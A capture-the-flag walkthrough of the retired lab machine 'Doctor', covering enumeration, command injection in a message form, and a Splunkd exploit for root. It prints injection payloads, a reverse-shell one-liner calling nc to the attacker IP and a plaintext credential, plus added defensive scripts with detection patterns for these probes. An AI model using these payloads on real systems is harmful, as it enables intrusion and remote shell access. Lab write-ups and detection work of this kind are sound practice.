Doctor is a retired vulnerable machine running Linux. We are expected to obtain the user and root flags by exploiting its vulnerabilities.
Let's start with an nmap network scan to get to know the target machine.
Classic Scan
Full Port Scan
The network scan shows that three ports are open: 22/tcp ssh (OpenSSH 8.2), 80/tcp http (Apache httpd) and 8089/tcp ssl/http (Splunkd).
Since port 80 is open, we continue in the browser to perform web enumeration.
Web enumeration did not give us enough information, so we run directory and file scans with gobuster.
The gobuster scan found nothing either. So much inconclusiveness 😊 We go over the web enumeration again in case something was overlooked, and the address info@doctors.htb on the main page attracts our attention.
We add the hostname to the /etc/hosts file and access the site again.
After editing /etc/hosts we can reach doctors.htb, where we are greeted by a login page.
Default passwords do not work and we can't log in, so I register an account in the Register tab.
Let's log in on the login screen with the user we just created.
After logging in, we continue enumeration.
We looked at the source code, looked at the developer tools, ran a gobuster directory scan, and got no significant results.
Then we enumerated the application interface itself, looking for input fields or URL values that can be manipulated.
Here we see the New Message section as the input field; let's add a message.
Messages can be added. Thinking like an attacker, let's add input values that fall outside the normal flow:
<script>alert("hi")</script>
<?php system($_GET['cmd']);?>
whoami
pwd
These payloads were added as messages, but nothing came back in the application's response.
Since none of them produce visible output in the response, let's check with curl whether the commands are actually executed (an out-of-band request to our own host tells us).
As you can see, the command is executed. Let's try to get ourselves a reverse shell.
curl http://10.10.14.13/$(nc.traditional$IFS-e/bin/sh$IFS'10.10.14.13'$IFS'4747')
We try to get the reverse shell using this command.
We now have a shell with low privileges, so we need to perform privilege escalation.
We perform local enumeration by transferring and running the LinPEAS tool.
While looking for password information, a backup file attracted our attention.
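From the defender's side, the injection probes above (a script tag, a PHP tag, `$(...)` command substitution and `$IFS` used as a space substitute) all leave recognisable traces in web server logs when they travel in the URL. The following script is an added example, not part of the original writeup or the target's code: it parses constructed Apache combined-log lines (the IPs, paths and timestamps are made up for the example) and tags requests that contain those markers after URL-decoding them.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (not from the target); the payloads mirror the
# probe shapes used in the writeup, placed in a GET query so that they appear in the log.
SAMPLE_LOG = """\
10.10.14.13 - - [01/Jan/2021:10:00:00 +0000] "GET /home HTTP/1.1" 200 1523
10.10.14.13 - - [01/Jan/2021:10:00:05 +0000] "GET /post/new?title=%3Cscript%3Ealert(%22hi%22)%3C/script%3E HTTP/1.1" 302 0
10.10.14.13 - - [01/Jan/2021:10:00:09 +0000] "GET /post/new?title=%3C%3Fphp%20system(%24_GET%5B%27cmd%27%5D)%3B%3F%3E HTTP/1.1" 302 0
10.10.14.13 - - [01/Jan/2021:10:00:15 +0000] "GET /post/new?title=curl%20http://10.10.14.13/%24(whoami) HTTP/1.1" 302 0
10.10.14.13 - - [01/Jan/2021:10:00:20 +0000] "GET /post/new?title=nc.traditional%24IFS-e/bin/sh HTTP/1.1" 302 0
10.10.14.13 - - [01/Jan/2021:10:00:25 +0000] "GET /archive HTTP/1.1" 200 812
"""

# Apache "combined"/"common" log prefix: client, identd, user, timestamp, request line, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

# Signatures for the probe families seen in the writeup. Order matters only for the
# order of tags in the report.
SIGNATURES = {
    "xss_script_tag": re.compile(r"<\s*script\b", re.I),
    "php_tag": re.compile(r"<\?php\b", re.I),
    "shell_cmd_substitution": re.compile(r"\$\(|`"),
    "ifs_space_evasion": re.compile(r"\$\{?IFS\}?"),
    "shell_binary": re.compile(r"/bin/(?:ba)?sh\b|\bnc(?:\.traditional)?\b"),
}


def classify(path: str) -> list[str]:
    """Return the signature names that match the URL-decoded request path."""
    # Decode twice so that a double-encoded payload (%2524 -> %24 -> $) is still caught.
    decoded = unquote(unquote(path))
    return [name for name, rx in SIGNATURES.items() if rx.search(decoded)]


def scan_log(text: str) -> list[dict]:
    """Parse log lines and return one finding per request that matches a signature."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # unparsable line; a real pipeline would count these separately
        tags = classify(m["path"])
        if tags:
            findings.append({
                "ip": m["ip"],
                "ts": m["ts"],
                "path": unquote(m["path"]),
                "status": int(m["status"]),
                "tags": tags,
            })
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['ts']} {f['ip']} {f['status']} {','.join(f['tags'])} {f['path']}")
```

Two caveats a practitioner should keep in mind: the message form in the writeup is submitted as a POST, and Apache does not log request bodies by default, so log-based detection only sees payloads that travel in the URL; and a 302 or 200 status says nothing about whether the payload was executed, which is exactly why the attacker verified execution with an out-of-band curl request. Egress monitoring for unexpected outbound connections from the web server (the curl callback and the netcat connection) covers what the access log cannot.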
We obtained the password of the user shaun.
With it we were able to get our user flag.
Since we don't have access to the /root directory, we continue with enumeration.
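The credential that led to the user flag came from a backup file that was readable by the low-privileged shell. The following script is an added example, not part of the original writeup: it audits the text of a constructed backup file (the log line and config line in it are made up for the example) for password-bearing URL queries and configuration keys, reports them with the secret redacted, and includes a helper that decides whether a file's mode bits make it readable by everyone, which is the second half of the problem.

```python
import re
import stat

# Constructed contents of a backup file (not the target's actual file). It mixes harmless
# lines with two ways a password typically ends up in a backup: a URL query and a config key.
SAMPLE_BACKUP = """\
192.0.2.10 - - [05/Sep/2020:11:17:34 +0000] "GET /home HTTP/1.1" 200 1523
192.0.2.10 - - [05/Sep/2020:11:17:50 +0000] "GET /reset_password?email=user%40example.test&password=ExampleOnly1 HTTP/1.1" 500 453
# application settings
DB_HOST=localhost
DB_PASSWORD=changeme123
LOG_LEVEL=info
"""

# Each pattern captures only the secret value in group 1 so that it can be redacted.
PATTERNS = [
    ("url_query_password",
     re.compile(r"[?&](?:pass(?:word)?|pwd)=([^&\s\"]+)", re.I)),
    ("config_password",
     re.compile(r"^\s*(?:[A-Z_]*PASS(?:WORD)?|password)\s*[=:]\s*[\"']?([^\"'\s]+)", re.I)),
]


def redact(value: str) -> str:
    """Keep the first two characters so the finding is recognisable without exposing it."""
    return value[:2] + "*" * (len(value) - 2) if len(value) > 2 else "**"


def find_secrets(text: str) -> list[tuple[int, str, str]]:
    """Return (line number, pattern name, redacted value) for every password-like hit."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        for name, rx in PATTERNS:
            for m in rx.finditer(line):
                findings.append((lineno, name, redact(m.group(1))))
    return findings


def is_world_readable(mode: int) -> bool:
    """True if the 'other' read bit is set on a st_mode value (e.g. from os.stat)."""
    return bool(mode & stat.S_IROTH)


if __name__ == "__main__":
    for lineno, name, value in find_secrets(SAMPLE_BACKUP):
        print(f"line {lineno}: {name} -> {value}")
    # 0o644 is the usual default for files created by a service or copied in a backup.
    print("0o644 world-readable:", is_world_readable(0o644))
    print("0o640 world-readable:", is_world_readable(0o640))
```

In practice the fix is on both sides: backups and logs belong in a directory that the web service account and other unprivileged users cannot read, and credentials should never be accepted in a URL query in the first place, because they are then written to access logs and copied into every backup of those logs.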
linpeas.sh did not give us any detailed leads, and in local enumeration we could not get anything useful from the files. There is a Splunkd service on port 8089, so let's try connecting to it.
It shows us a version banner.
When we clicked on Services it asked for credentials, and we were able to log in with shaun:Guitar123.
There were many tabs under Services.
First, let's start with the version and see whether an exploit exists for it.
We saw that there is an RCE vulnerability.
We download the exploit code from GitHub.
Let's run the Python code.
This is how we obtained root privileges.